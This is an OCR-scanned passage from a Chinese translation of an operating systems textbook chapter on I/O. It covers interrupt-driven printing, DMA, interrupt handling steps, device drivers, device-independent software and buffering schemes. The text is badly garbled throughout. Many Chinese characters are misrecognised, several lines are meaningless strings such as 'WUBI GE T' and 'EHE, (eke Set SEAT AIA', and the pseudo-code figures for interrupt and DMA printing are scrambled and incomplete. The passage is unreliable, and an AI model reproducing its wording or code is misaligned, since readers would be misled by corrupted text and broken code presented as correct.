

现在 我 们 考虑 在 不 缓冲 字符 而 是 在 每 个 字符 到 来 时 便 打 印 的 打印 
机 上 进行 打印 的 情形 。 如 采 打 印 机 每 秒 可 以 打印 100 个 字符 ， 那 么 打印 
每 个 字符 将 花费 10ms。 这 意味 着 ， 当 每 个 字符 写 到 打印 机 的 数据 寄存 
器 中 之 后 ，CPU 将 有 10ms 搁 置 在 无 价值 的 循环 中 ， 等 竺 允许 输出 下 一 
个 字符 。 这 10ms 时 间 足 以 进行 一 次 上 下 文 切换 并 且 运 行 其 他 进程 ， 否 
WUBI GE T ° 
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收 一 个 字符 时 融 将 第 一 个 字符 复制 到 打印 机 中 。 这 时 ，CPU 要 调用 调 
度 程 序 ， 并 且 某 个 其 他 进程 将 运行 。 请 求 打 印字 符 串 的 进程 将 被 阻 
塞 ， 直 到 整个 字符 串 打 印 完 。 系 统 调 用 所 做 的 工作 如 图 5-9a 所 示 。 


当 打 印 机 将 字符 打印 完 并 且 准 备 好 接收 下 一 个 字符 时 ， 它 将 产生 
一 个 中 断 。 这 一 中 断 将 停止 当前 进程 并 且 保 存 其 状态 。 然 后 ， 打 印 机 
中 断 服务 过 程 将 运行 。 图 5-9b 所 示 为 打印 机 中 断 服务 过 程 的 一 个 粗略 的 
版 本 。 如 采 没 有 更 多 的 字符 要 打印 ， 中 断 处 理 程序 将 采取 某 个 操作 将 
用 户 进 程 解除 阻塞 。 否 则 ， 它 将 输出 下 一 个 了 字符， 应 管 中 断 ， 并 且 返 
回 到 中 断 之 前 正在 运行 的 进程 ， 该 进程 将 从 其 停止 的 地 方 继续 运行 。 


copy_from_user(buffer, p, count); 
enable_interrupts( ); 

while (*printer_status_reg != READY) ; 
*printer_data_register = p[0]; 


if (count == 0) { 
unblock _user{ ); 

} else { 
*printer_data_register = p[i]; 
count = count — 1; 


} 
acknowledge _interrupt( ); 
return_from_interrupt( ); 


scheduler( ); 


i=i+1: 


a) b) 


图 5-9 使 用 中 断 驱 动 VO 将 一 个 字符 串 写 到 打印 机 :a) 当 打印 系统 调 
用 被 发 出 时 执行 的 代码 ; b) 打 印 机 的 中 断 服务 过 程 


5.2.4 使 用 DMA 的 IO 


中 断 驱 动 JO 的 一 个 明显 缺点 是 中 断 发 生 在 每 个 字符 上 。 中 断 要 人 花 
费时 间 ， 所 以 这 一 方法 将 浪费 一 定数 量 的 CPU 时 间 。 这 一 问题 的 一 种 
解决 方法 是 使 用 DMA。 此 处 的 思路 是 让 DMA 控 制 器 一 次 给 打印 机 提供 
一 个 字符 ， 而 不 必 打 扰 CPU。 本 质 上 ，DMA 是 程序 控制 /JO， 只 是 由 
DMA 控 制 器 而 不 是 主 CPU 做 全 部 工作 。 这 一 策略 需要 特殊 的 硬件 

(DMA 控 制 器 ) ， 但 是 使 CPU 获得 自由 从 而 可 以 在 IO 期 间 做 其 他 工 
作 。 使 用 DMA 的 代码 概要 如 图 5-10 所 示 。 


copy_from_user(buffer, p, count); 
set_up_DMA_controller( ); 


Scheduler( ); 


a) 


图 5-10 使 用 DMA 打 印 一 个 字符 串 : a) 当 打印 系统 调用 被 发 出 时 执 
行 的 代码 ; b) 中 断 服务 过 程 


DMA 重 大 的 成 功 是 将 中 断 的 次 数 从 打印 每 个 字符 一 次 减少 到 打印 
每 个 缓冲 区 一 次 。 如 条 有 许多 字符 并 且 中 断 十 分 缓慢 ， 那 么 采用 DMA 
可 能 是 重要 的 改进 。 另 一 方面 ，DMA 控 制 器 通常 比 主 CPU 要 慢 很 多 。 
如 条 DMA 控 制 硕 不 能 以 全 速 豫 动 设备 ， 或 者 CPU 在 等 待 DMA 中 断 的 同 
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更 好 ” 


5.3 IO 软件 层次 


IO 软件 通 单 组 织 成 四 个 层次 ， 如 图 5-11 所 示 。 每 一 层 具 有 一 个 要 
执行 的 定义 明确 的 功能 和 一 个 的 定义 明确 的 与 邻近 层次 的 接口 。 功 能 
与 接口 随 系统 的 不 同 而 不 同 ， 所 以 下 面 的 讨论 并 不 针对 一 种 特定 的 机 
大 。 我 们 将 从 发 层 开始 讨论 每 一 层 。 


用 户 级 MO 软件 


与 设备 无 关 的 操作 系统 软件 

设备 驱动 程序 
中 断 处 理 程 序 
人 硬件 


图 5-11 IO 软件 系统 的 层次 


5.3.1 中断 处 理 程序 


虽然 程序 控制 7O 偶 尔 是 有 益 的 ， 但 是 对 于 大 多 数 MO 而 言 ， 中 断 是 
令 人 不 愉快 的 事情 并 且 无 法 避免 。 应 当 将 其 深 深 地 隐藏 在 操作 系统 
部 ， 以 便 系 统 的 其 他 部 分 尽量 不 与 它 发 生 联 系 。 隐 藏 它们 的 最 好 办 法 
是 将 启动 一 个 MO 操作 的 张 动 程序 阻塞 起 来 ， 直 到 IO 操作 完成 且 产生 一 


个 中 断 。 驱 动 程序 阻塞 自己 的 手段 有 : 在 一 个 信号 量 上 执行 down 操 
作 、 在 一 个 条 件 变量 上 执行 wait 操 作 、 在 一 个 消息 上 执行 receive 操 作 或 
者 某 些 类 似 的 操作 。 


当中 断 发 生 时 ， 中 断 处 理 程序 将 做 它 必 须要 做 的 全 部 工作 以 便 对 
中 断 进行 处 理 。 然 后 ， 它 可 以 将 启动 中 断 的 驱动 程序 解除 阻塞 。 在 一 
些 情 形 中 ， 它 只 是 在 一 个 信号 量 上 执行 up 操作 ;， 其 他 情形 中 ， 是 对 管 
程 中 的 条 件 变 量 执行 signal 操 作 ; 还 有 一 些 情形 中 ， 有 是 向 被 阻塞 的 驱动 
程序 发 一 个 消息 。 在 所 有 这 些 情形 中 ， 中 断 最 终 的 结果 是 使 先前 被 阻 
塞 的 驱动 程序 现在 能 够 继续 运行 。 如 果 驱 动 程序 构造 为 内 核 进 程 ， 具 
有 它们 上 自己 的 状态 、 堆 栈 和 程序 计数 器， 那么 这 一 模型 运转 得 最 好 。 


当然 ， 现 实 没有 如 此 简单。 对 一 个 中 断 进 行 处 理 并 不 只 是 简单 地 
捕获 中 断 ， 在 某 个 信号 量 上 执行 up 操作 ， 然 后 执行 一 条 IRET 指 令 从 中 
靳 返回 到 先前 的 进程 。 对 操作 系统 而 言 ， 还 涉及 更 多 的 工作 。 我 们 将 
按 一 系列 步骤 给 出 这 一 工作 的 轮廓 ， 这 些 步 骤 是 硬件 中 断 完 成 之 后 必 
须 在 软件 中 执行 的 。 应 该 注意 的 是 ， 细 节 是 非常 依赖 于 系统 的 ， 所 以 
下 面 列 出 的 某 些 步 又 在 一 个 特定 的 机 器 上 可 能 是 不 必要 的 ， 而 没有 列 
出 的 步骤 可 能 是 必需 的 。 此 外 ， 确 实 发 生 的 步骤 在 某 些 机 器 上 也 可 能 
有 不 同 的 顺序 。 


1) 保存 没有 被 中 断 硬件 保存 的 所 有 寄存 器 (包括 PSW) ° 


2) 为 中 断 服 务 过 程 设置 上 下 文 ， 可 能 包括 设置 TLB、MMU 和 页 
表 o 


3) 为 中 断 服 务 过 程 设置 堆栈 。 


4) 应 答 中 断 控 制 夯 ， 如 采 不 存在 集中 的 中 断 控制 硕 ， 则 再 次 开放 中 
RE © 


5) 将 寄存 器 从 它们 被 保存 的 地 方 (可 能 是 某 个 堆栈 ) 复制 到 进程 表 


06) 运行 中 断 服务 过 程 ， 从 发 出 中 断 的 设备 控制 如 的 寄存 如 中 提取 信 


7) 选 择 下 一 次 运行 哪个 进程 ， 如 果 中 断 导 致 某 个 被 阻塞 的 高 优先 级 
进程 变 为 吏 绪 ， 则 可 能 选择 它 现在 惑 运行 。 


8) 为 下 一 次 要 运行 的 进程 设置 MMU 上 下 文 ， 也 许 还 需要 设置 某 个 
TLB ° 


9) 装 入 新 进程 的 寄存 器 ， 包 括 其 PSW 。 


10) 开 始 运 行 新 进程 。 


由 此 可 见 ， 中 断 处 理 远 不 是 无 足 轻重 的 小 事 。 它 要 伦 费 相当 多 的 
CPU 指 令 ， 特 别 十 在 存在 虚拟 内 存 并 且 必 须 设置 页 表 或 者 必须 保存 


MMU 状 态 (例如 R 和 M 位 ) 的 机 器 上 。 在 某 些 机 器 上 ， 当 在 用 户 态 与 
核心 态 之 间 切 换 时 ， 可 能 还 需要 管理 TLB 和 CPU 高 速 缓存 ， 这 就 要 伦 费 
颌 外 的 机 器 周期 。 


5.3.2 ”设备 驱动 程序 


在 本 章 前 面 的 内 容 中 ， 我 们 介绍 了 设备 控制 器 所 做 的 工作 。 我 们 
注意 到 每 一 个 控制 侨 都 设 有 某 些 设备 寄存 器 用 来 向 设备 发 出 命令 ， 或 
者 设 有 茶 些 设备 寄存 邵 用 来 读 出 设备 的 状态 ， 或 者 设 有 这 两 种 设备 寄 
存 器 。 设 备 寄 存 器 的 数量 和 命令 的 性 质 在 不 同 设 备 之 间 有 着 根本 性 的 
不 同 。 例 如 ,鼠标 驱 动 程序 必须 从 鼠标 接收 信息 ， 以 识别 鼠标 移动 了 
多 远 的 距离 以 及 当前 哪 一 个 键 被 按 下 。 相 反 ， 磁 盘 驱 动 程序 可 能 必须 
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征 有 很 大 区 别 的 。 


因而 ， 每 个 连接 到 计算 机 上 的 IO 设备 都 需要 某 些 设备 特定 的 代码 
来 对 其 进行 控制 。 这 样 的 代码 称 为 设备 驱动 程序 (device driver) ， 它 
一 般 由 设备 的 制造 商 编 写 并 随同 设备 一 起 交付 。 因 为 每 一 个 操作 系统 
都 需要 自己 的 驱动 程序 ， 所 以 设备 制造 商 通 常 要 为 大 干流 行 的 操作 系 
统 提供 驱动 程序 。 


每 个 设备 驱动 程序 通常 处 理 一 种 类 型 的 设备 ， 或 者 至 多 处理 一 类 
紧密 相关 的 设备 。 例 如 ，SCSI 磁 盘 驱 动 程序 通常 可 以 处 理 不 同 大 小 和 
不 同 速度 的 多 个 SCSI 磁 副 ， 或 许 还 可 以 处 理 SCSI CD-ROM 。 而 男 一 方 
面 ， 鼠 标 和 游戏 操纵 杆 是 如 此 的 不 同 ， 以 至 于 它们 通常 需要 不 同 的 驱 


动 程序 。 然 而 ， 对 于 一 个 设备 驱动 程序 控制 多 个 不 相关 的 设备 并 不 存 
在 技术 上 的 限制 ， 只 是 这 样 做 并 不 是 一 个 好 主意 。 


为 了 访问 设备 的 硬件 (意味 着 访问 设备 控制 器 的 寄存 器 ) ， 设 备 
驱动 程序 通常 必须 是 操作 系统 内 核 的 一 部 分 ， 至 少 对 目前 的 体系 结构 
苹 如 此 。 实 际 上 ， 有 可 能 构造 运行 在 用 户 空 间 的 驱动 程序 ， 使 用 系统 
调用 来 读 写 设备 寄存 器 。 这 一 设计 使 内 核 与 驱动 程序 相隔 离 ， 并 且 使 
驱动 程序 之 间 相 互 隔离 ， 这 样 做 可 以 消除 系统 朋 溃 的 一 个 主要 源头 
一 一 有 问题 的 驱动 程序 以 这 样 或 那样 的 方式 干扰 内 核 。 对 于 建立 融 度 
可 靠 的 系统 而 言 ， 这 绝对 是 正确 的 方向 。MINIX 3 束 是 一 个 这 样 的 系 
统 ， 其 中 设备 张 动 程序 就 作为 用 户 进程 而 运行 。 然 而 ， 因 为 大 多 数 其 
他 桌面 操作 系统 要 求 驱动 程序 运行 在 内 核 中 ， 所 以 我 们 在 这 里 只 考虑 
这 样 的 模型 。 


因为 操作 系统 的 设计 者 知道 由 外 人 编写 的 驱动 程序 代码 片断 将 被 
安装 在 操作 系统 的 内 部 ， 所 以 需要 有 一 个 体系 结构 来 允许 这 样 的 安 
装 。 这 意味 着 要 有 一 个 定义 明确 的 模型 ， 规 定 驱 动 程序 做 什么 事情 以 
及 如 何 与 操作 系统 的 其 余部 分 相互 作用 。 设 备 张 动 程序 通常 位 于 操作 
系统 其 余部 分 的 下 面 ， 如 图 5-12 所 示 。 


用 户 进 程 


用 户 


空间 


操作 系统 的 其 余部 分 
内 核 | 


空间 


CD-ROM 
驱动 程序 


便携 式 摄像 机 
驱动 程序 


打印 机 驱动 程序 


图 5-12 设备 驱动 程序 的 逻辑 定位 。 实 际 上 ， 驱 动 程序 和 设备 控制 右 
之 间 的 所 有 通信 都 通过 总 线 


操作 系统 通常 将 驱动 程序 归 类 于 少数 的 类 别 之 一 。 最 为 通用 的 类 
别 是 块 设备 (block device) 和 字符 设备 (character device) 。 块 设备 


(例如 磁盘 ) 包含 多 个 可 以 独立 寻 址 的 数据 块 ， 字 符 设 备 (例如 键盘 
和 打印 机 ) 则 生成 或 接收 字符 流 。 


大 多 数 操作 系统 都 定义 了 一 个 所 有 块 设备 都 必须 文 持 的 标准 接 
口 ， 并 且 还 定义 了 另 一 个 所 有 字符 设备 都 必须 文 持 的 标准 接口 。 这 些 
接口 由 许多 过 程 组 成 ， 操 作 系 统 的 其 余部 分 可 以 调用 它们 让 驱动 程序 
工作 。 典 型 的 过 程 是 那些 读 一 个 数据 块 OREM) 或 者 写 一 个 
字符 串 〈 对 字符 设备 而 言 ) 的 过 程 。 


在 某 些 系统 中 ， 操 作 系 统 是 一 个 二 进 制 程序 ， 包 含 需要 编译 到 其 
内 部 的 所 有 驱动 程序 。 这 一 方案 多 年 以 来 对 UNIX 系 统 而 言 是 标准 规 
范 ， 因 为 UNIX 系 统 主要 由 计算 中 心 运行 ，IO 设 备 几 乎 不 发 生变 化 。 如 
果 添 加 了 一 个 新 设备 ， 系 统管 理 员 只 需 重 新 编译 内 核 ， 将 新 的 驱动 程 
序 增加 到 新 的 二 进 制程 序 中 。 


随 着 个 人 计算 机 的 出 现 ， 这 一 模型 不 再 起 作用 ， 因 为 个 人 计算 机 
有 太 多 种 类 的 IO 设备 。 即 便 拥 有 源 代 码 或 目标 模块 ， 也 只 有 很 少 的 用 
户 有 能 力 重 新 编译 和 重新 连接 内 核 ， 何 况 他 们 并 不 总 征 拥 有 产 代码 或 
目标 模块 。 为 此 ， 从 MS-DOS 开 始 ， 操 作 系 统 转 向 驱动 程序 在 执行 期 间 
动态 地 小 和 载 到 系统 中 的 男 一 个 模型 。 不 同 的 操作 系统 以 不 同 的 方式 处 
理 驱 动 程序 的 装载 工作 。 
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设备 无 关 的 软件 所 发 出 的 抽象 的 读 写 请 求 ， 并 且 目 睹 这 些 请 求 被 执 
行 。 除 此 之 外 ， 还 有 一 些 其 他 的 功能 必须 执行 。 例 如 ， 如 果 需 要 的 
话 ， 驱 动 程序 必须 对 设备 进行 初始 化 。 它 可 能 还 需要 对 电源 需求 和 日 
志 事 件 进行 管理 。 


许多 设备 驱动 程序 具有 相似 的 一 般 结 构 。 典 型 的 驱动 程序 在 启动 
时 要 检查 输入 参数 ， 检 查 输入 参数 的 目的 是 捅 清 它 们 是 否 虾 有效 的 ， 
如 采 不 是 ， 则 返回 一 个 错误 。 如 有 果 输 入 参数 是 有 效 的 ， 则 可 能 需要 进 
行 从 抽象 事项 到 具体 事项 的 转换 。 对 磁盘 驱动 程序 来 说 ， 这 可 能 意味 
着 将 一 个 线性 的 磁盘 块 号 转换 成 磁盘 几何 布局 的 磁头 、 人 磁道、 忆 区 和 
柱 面 号 。 


接着 ， 张 动 程序 可 能 要 检查 设备 当前 是 否 在 使 用 。 如 有 果 在 使 用 ， 
请 求 将 被 排 入 队列 以 备 稍 后 处 理 。 如 果 设 备 是 空 几 的 ， 驱 动 程序 将 检 
查 便 件 状态 以 了 解 请 求 现在 是 否 能 够 得 到 处 理 。 在 传输 能 够 开始 之 
前 ， 可 能 需要 接 通 设备 或 者 启动 咏 达 。 一 旦 设备 接 通 并 就 绪 ， 实 际 的 
控制 束 可 以 开始 了 。 


控制 设备 意味 着 向 设备 发 出 一 系列 命令 。 依 据 控 制 设备 必须 要 做 
的 工作 ， 驱 动 程序 处 在 确定 命令 序列 的 地 方 。 驱 动 程序 在 获知 哪些 命 
令 将 要 发 出 之 后 ， 它 束 开 始 将 它们 写 入 控制 硼 的 设备 寄存 做 。 张 动 程 
序 在 把 每 个 命令 写 到 控制 器 之 后 ， 它 可 能 必须 进行 检测 以 了 解 控 制 句 


征 否 已 经 接收 命令 并 且 准 备 好 接收 下 一 个 命令 。 这 一 序列 继续 进行 ， 
直到 所 有 命令 被 发 出 。 对 于 某 些 控 制 侨 ， 可 以 为 其 提供 一 个 在 内 存 中 
的 命令 链表 ， 并 且 告 诉 它 自己 去 读 取 并 处 理 所 有 命令 而 不 需要 操作 系 


统 提 供 进一步 帮助 。 


命令 发 出 之 后 ， 会 牵涉 两 种 情形 之 一 。 在 多 数 情况 下 ， 设 备 张 动 
程序 必须 等 待 ， 直 到 控制 右 为 其 做 某 些 事情 ， 所 以 驱动 程序 将 阻塞 其 
目 身 直到 中 断 到 来 解除 阻塞 。 然 而 ， 在 另外 一 些 情况 下 ， 操 作 可 以 无 
延迟 地 完成 ， 所 以 驱动 程序 不 需要 阻塞 。 在 字符 模式 下 滚动 屏幕 只 需 
要 写 少 许字 节 到 控制 磊 的 寄存 右 中 ， 由 于 不 需要 机 械 运 动 ， 所 以 整个 
操作 可 以 在 儿 纳 秒 内 完成 ， 这 全 十 后 一 种 情形 的 例子 。 


在 前 一 种 情况 下 ， 阻 塞 的 驱动 程序 可 以 被 中 断 唤醒 。 在 后 一 种 情 
况 下 ， 张 动 程序 根本 就 不 会 休眠 。 无 论 是 哪 一 种 情况 ， 操 作 完 成 之 后 
驱动 程序 都 必须 检查 错误 。 如 采 一 切 顺 利 ， 驱 动 程序 可 能 要 将 数据 
〈 例 如 刚刚 读 出 的 一 个 磁盘 块 ) 传送 给 与 设备 无 关 的 软件 。 最 后 ， 它 
品 调 用 者 返回 一 些 用 于 错误 报告 的 状态 信息 。 如 末 还 有 其 他 未 完成 的 
请 求 在 排队 ， 则 选择 一 个 启动 执行 。 如 采 队 列 中 没有 未 完成 的 请 求 ， 
则 该 驱动 程序 将 阻塞 以 等 每 下 一 个 请 求 。 


这 一 简单 的 模型 只 是 现实 的 粗略 近似 ， 许 多 因 和 又 使 相关 的 代码 比 
这 要 复杂 得 多 。 首 先 ， 当 一 个 驱动 程序 正在 运行 时 ， 某 个 1/O 设 备 可 能 
会 完成 操作 ， 这 样 束 会 中 断 驱 动 程序 。 中 断 可 能 会 导致 一 个 设备 驱动 


程序 运行 ， 事 实 上 ， 它 可 能 导致 当前 驱动 程序 运行 。 例 如 ， 当 网 络 驱 
动 程序 正在 处 理 一 个 到 来 的 数据 包 时 ， 男 一 个 数据 包 可 能 到 来 。 
此 ， 驱 动 程序 必须 是 重 入 的 (reentrant) ， 这 意味 着 一 个 正在 运行 的 驱 
动 程序 必须 预料 到 在 第 一 次 调用 完成 之 前 第 二 次 被 调用 。 


在 一 个 热 可 揪 拔 的 系统 中 ， 设 备 可 以 在 计算 机 运行 时 添加 或 删 
除 。 因 此 ， 当 一 个 驱动 程序 正 从 于 从 某 设备 读数 据 时 ， 系 统 可 能 会 通 
知 它 用 户 突然 将 设备 从 系统 中 删除 了 。 在 这 样 的 情况 下 ， 不 但 当前 IO 
传送 必须 中 止 并 且 不 能 破坏 任何 核心 数据 结构 ， 而 且 任何 对 这 个 现 已 
消失 的 设备 的 巧 而 未 决 的 请 求 都 必须 适当 地 从 系统 中 删除 ， 同 时 还 要 
为 它们 的 调用 者 提供 这 一 坏 消 轧 。 此 外 ， 未 预料 到 的 新 设备 的 添加 可 
能 导致 内 核 重新 配置 资源 〈 例 如 中 断 请 求 线 ) ， 从 驱动 程序 中 撤除 旧 
资源 ， 并 且 在 适当 位 置 填 入 新 资源 


驱动 程序 不 允许 进行 系统 调用 ,但 是 它们 经 党 需要 与 内 核 的 其 余 

部 分 进行 交互 。 对 某 些 内 核 过 程 的 调用 通常 是 允许 的 。 例 如 ， 通 常 需 

要 调用 内 核 过程 来 分 配 和 释放 硬 接 线 的 内 存 页 面 作为 缓冲 区 。 还 可 能 
需要 其 他 有 用 的 调用 来 管理 MMU、 定 时 器 、DMA 挥 制 器 、 中 断 控 制 妖 
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5.3.3 与 设备 无 关 的 IO 软件 


虽然 WO 软件 中 有 一 些 是 设备 特定 的 ， 但 是 其 他 部 分 W/O 软件 是 与 设 
备 无 关 的 。 设 备 驱 动 程序 和 与 设备 无 关 的 软件 之 间 的 确切 界限 依赖 于 
具体 系统 (和 设备 ) ， 因 为 对 于 一 些 本 来 应 按照 与 设备 无 关 方式 实现 
的 功能 ， 出 于 效率 和 其 他 原因 ， 实 际 上 是 由 驱动 程序 来 实现 的 。 图 5-13 
所 示 的 功能 典型 地 由 与 设备 无 关 的 软件 实现 。 
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图 5-13 与 设备 无 天 的 IO 软件 的 功能 


与 设备 无 关 的 软件 的 基本 功能 是 执行 对 所 有 设备 公共 的 IO 功能 ， 
并 且 辐 用 户 层 软 件 提供 一 个 统一 的 接口 。 下 面 我 们 将 详细 介绍 上 述 问 


题 。 


1. 设 备 张 动 程序 的 统一 接口 


操作 系统 的 一 个 主要 问题 是 如 何 使 所 有 WO 设备 和 驱动 程序 看 起 来 
或 多 或 少 是 相同 的 。 如 果 磁 盘 、 打 印 机 、 链 盘 等 接口 方式 都 不 相同 ， 
那么 每 次 在 一 个 新 设备 出 现时 ， 都 必须 为 新 设备 修改 操作 系统 。 必 须 
为 每 个 新 设备 修改 操作 系统 决 不 是 一 个 好 主意 。 


设备 驱动 程序 与 操作 系统 其 余部 分 之 间 的 接口 是 这 一 问题 的 一 个 
方面 。 图 5-14a 所 示 为 这 样 一 种 情形 : 每 个 设备 张 动 程 序 有 不 同 的 与 操 
作 系 统 的 接口 。 这 意味 着 ， 可 供 系 统 调用 的 驱动 程序 函数 随 驱 动 程序 
的 不 同 而 不 同 。 这 可 能 还 意味 着 ， 驱 动 程序 所 需要 的 内 核 画 数 也 是 随 
驱动 程序 的 不 同 而 不 同 的 。 综 合 起 来 看 ， 这 意味 着 为 每 个 新 的 驱动 程 
序 提供 接口 都 需要 大 量 全 新 的 编程 工作 。 


操作 系统 
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图 5-14 a) 没 有 标准 的 驱动 程序 接口 ，b) 具 有 标准 的 驱动 程序 接口 


相反 ， 图 5-14b 所 示 为 一 种 不 同 的 设计 ， 在 这 种 设计 中 所 有 驱动 程 
序 具有 相同 的 接口 。 这 样 一 来 ， 倘 大 符合 驱动 程序 接口 ， 那 么 添加 一 
个 新 的 驱动 程序 就 变 得 容易 多 了 。 这 还 意味 着 驱动 程序 的 编写 人 员 知 
道 驱 动 程序 的 接口 应 该 是 什么 样子 的 。 实 际 上 ， 昌 然 并 非 所 有 的 设备 
都 是 绝对 一 样 的 ， 但 是 通常 只 存在 少数 设备 类 型 ， 而 它们 的 确 大 体 上 
EAH EJAS ° 


这 种 设计 的 工作 方式 如 下 。 对 于 每 一 种 设备 类 型 ， 例 如 磁盘 或 打 
印 机 ， 操 作 系统 定义 一 组 驱动 程序 必须 文 持 的 函数 。 对 于 磁盘 而 言 ， 
这 些 函 数目 然 地 包含 读 和 写 ， 除 此 之 外 还 包含 开启 和 关闭 电源 、 格 式 
化 以 及 其 他 与 磁 弄 有 关 的 事情 。 张 动 程序 通 营 包含 一 张 表格 ， 这 张 表 
格 具 有 针对 这 些 函 数 指向 驱动 程序 自身 的 指针 。 当 驱动 程序 装载 时 ， 
操作 系统 记录 下 这 张 本 数 指针 表 的 地 址 ， 所 以 当 操 作 系统 需要 调用 一 
个 函数 时 ， 它 可 以 通过 这 张 表格 发 出 间接 调用 。 这 张 贸 数 指针 表 定义 
了 驱动 程序 与 操作 系统 其 余部 分 之 间 的 接口 。 给 定 类 型 (REN + TT EL 
机 等 ) 的 所 有 设备 都 必须 服从 这 一 要 求 。 


如 何 给 IO 设备 命名 是 统一 接口 问题 的 另 一 个 方面 。 与 设备 无 关 的 
软件 要 人 负责 把 符号 化 的 设备 名 映射 到 适当 的 驱动 程序 上 。 例 如 ,在 
UNIX 系 统 中 ， 像 /dev/disk0 这 样 的 设备 名 惟一 确定 了 一 个 特殊 文件 的 i 
节点 ， 这 个 节点 包含 了 主 设备 号 (major device number) ， 主 设备 号 用 


于 定位 相应 的 驱动 程序 。i 节 点 还 包含 次 设备 号 (minor device 


number) ， 次 设备 号 作为 参数 传递 给 驱动 程序 ， 用 来 确定 要 读 或 写 的 
具体 单元 。 所 有 设备 都 具有 主 设备 号 和 次 设备 号 ， 并 且 所 有 驱动 程序 
都 是 通过 使 用 主 设备 号 来 选择 驱动 程序 而 得 到 访问 。 


与 设备 命名 密切 相关 的 是 设备 保护 。 系 统 如 何 防止 无 权 访 问 设备 
的 用 户 访问 设备 呢 ? 在 UNIX 和 Windows 中 ， 设 备 是 作为 命名 对 象 出 现 
在 文件 系统 中 的 ， 这 意味 着 针对 文件 的 常规 的 保护 规则 也 适用 于 IO 设 
备 。 系 统管 理 员 可 以 为 每 一 个 设备 设置 适当 的 访问 权限 。 


2. 绥 冲 


无 论 对 于 块 设备 还 是 对 于 字符 设备 ， 由 于 种 种 原因 ， 缓 神 也 是 一 
个 重要 的 问题 。 作 为 例子 ， 我 们 考虑 一 个 想 要 从 调制 解 调 器 读 入 数据 
的 进程 。 证 用 户 进程 执行 read 系 统 调用 并 阻塞 自己 以 等 待 字符 的 到 来 ， 
这 是 对 到 来 的 字符 进行 处 理 的 一 种 可 能 的 策略 。 每 个 字符 的 到 来 都 将 
引起 中 断 ， 中 断 服务 过 程 负责 将 字符 递交 给 用 户 进程 并 且 将 其 解除 阻 
塞 。 用 户 进 程 把 字符 放 到 某 个 地 方 之 后 可 以 对 另 一 个 字符 执行 读 操作 
并 且 再 次 阻塞 。 这 一 模型 如 图 5-15a 所 示 。 
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图 5-15 a) 无 缓冲 的 输入 ;pb) 用 户 空间 中 的 缓冲 ;g 内 核 至 间 中 的 组 
冲 接 着 复制 到 用 户 空 间 ;d 内 核 空 间 中 的 双 缓 冲 


这 种 处 理 方式 的 问题 在 于 : 对 于 每 个 到 来 的 字符 ， 都 必须 局 动用 
户 进程 。 对 于 短 剧 的 数据 流量 让 一 个 进程 运行 许多 次 效率 会 很 低 ， 所 
以 这 不 是 一 个 民 好 的 设计 。 


图 5-15b 所 示 为 一 种 改进 措施 。 此 处 ， 用 户 进程 在 用 户 空间 中 提供 
了 一 个 包含 n 个 字符 的 缓冲 区 ， 并 且 执 行 读 入 n 个 字符 的 读 操 作 。 中 断 
服务 过 程 负责 将 到 来 的 字符 放 入 该 缓冲 区 中 直到 缓冲 区 填 满 ， 然 后 唤 
桓 用 户 进程 。 这 一 方案 比 前 一 种 方案 的 效率 要 高 很 多 ， 但 是 它 也 有 一 
个 缺点 : 当 一 个 字符 到 来 时 ， 如 果 缓 冲 区 被 分 页 而 调 出 了 内 存 会 出 现 
什么 问题 昵 ?解决 方法 是 将 缓冲 区 锁定 在 内 存 中 ， 但 是 如 果 许 多 进程 
都 在 内 存 中 锁定 页 面 ， 那 么 可 用 页 面 池 束 会 收缩 并 且 系 统 性 能 将 下 


降 。 


将 字符 放 到 这 个 缓冲 区 中 ， 如 图 5-15c 所 示 。 当 该 缓冲 区 被 填 满 的 时 
候 ， 将 包含 用 户 缓冲 区 的 页 面 调 入 内 存 (如 果 需 要 的 话 ) ， 并 且 在 一 
次 操作 中 将 内 核 缓冲 区 的 内 容 复 制 到 用 户 缓冲 区 中 。 这 一 方法 的 效率 


然而 ， 即 使 这 种 方案 也 面临 一 个 问题 ， 正 当 包 含 用 户 缓 冲 区 的 页 
面 从 磁盘 调 入 内 存 的 时 候 有 新 的 字符 到 来 ， 这 样 会 发 生 什么 事情 ? Al 
为 缓冲 区 已 满 ， 所 以 没有 地 方 放 置 这 些 新 来 的 字符 。 一 种 解决 问题 的 
方法 是 使 用 第 二 个 内 核 缓冲 区 。 第 一 个 缓冲 区 填 满 之 后 ， 在 它 被 清空 
之 前 ， 使 用 第 二 个 缓冲 区 ， 如 图 5-15d 所 示 。 当 第 二 个 缓冲 区 填 满 时 ， 
就 可 以 将 它 复制 给 用 户 (假设 用 户 已 经 请 求 它 ) 。 当 第 二 个 缓冲 区 正 
在 复制 到 用 户 空间 的 时 候 ， 第 一 个 缓冲 区 可 以 用 来 接收 新 的 字符 。 以 
这 样 的 方法 ， 两 个 缓冲 区 轮流 使 用 ， 当 一 个 缓冲 区 正在 被 复制 到 用 户 
空间 的 时 候 ， 男 一 个 缓冲 区 正在 收集 新 的 输入 。 像 这 样 的 缓冲 模式 称 
HIRUP (double buffering) ° 


广泛 使 用 的 男 一 种 形式 的 缓冲 是 循环 缓冲 区 (circular buffer) 。 它 
由 一 个 内 存 区 域 和 两 个 指针 组 成 。 一 个 指针 指向 下 一 个 空 几 的 字 ， 新 
的 数据 可 以 放置 到 此 处 。 男 一 个 指针 指 癌 缓冲 区 中 数据 的 第 一 个 字 ， 
该 字 尚 未 被 取 走 。 在 许多 情况 下 ， 当 添加 新 的 数据 时 (例如 刚刚 从 网 
络 到 来 ) ， 硬 件 将 推进 第 一 个 指针 ， 而 操作 系统 在 取 走 并 人 处理 数据 时 


推进 第 二 个 指针 。 两 个 指针 都 是 环绕 的 ， 当 它们 到 达 顶 部 时 将 回 到 克 


部 。 


缓冲 对 于 输出 也 是 十 分 重要 的 。 例 如 ， 对 于 没有 缓冲 区 的 调制 解 
调 上 器， 我 们 考虑 采用 图 5-15b 的 模型 输出 十 如 何 实 现 的 。 用 户 进 程 执行 
write 系统 调用 以 输出 n 个 字符 。 系 统 在 此 刻 有 两 种 选择 。 它 可 以 将 用 户 
阻塞 直到 写 完 所 有 字符 ， 但 是 这 样 做 在 低速 的 电话 线 上 可 能 花费 非常 
长 的 时 间 。 它 也 可 以 并 即将 用 户 释 放 并 且 在 进行 WO 的 同时 让 用 户 做 某 
EHE, (eke Set SEAT AIA: 用 户 进程 怎样 知道 
输出 已 经 完成 并 且 可 以 重用 缓冲 区 ? 系统 可 以 生成 一 个 信号 或 软件 中 
上 晰 ， 但 是 这 样 的 编程 方式 是 十 分 困难 的 并 且 被 证 明 是 竞争 条 件 。 对 于 
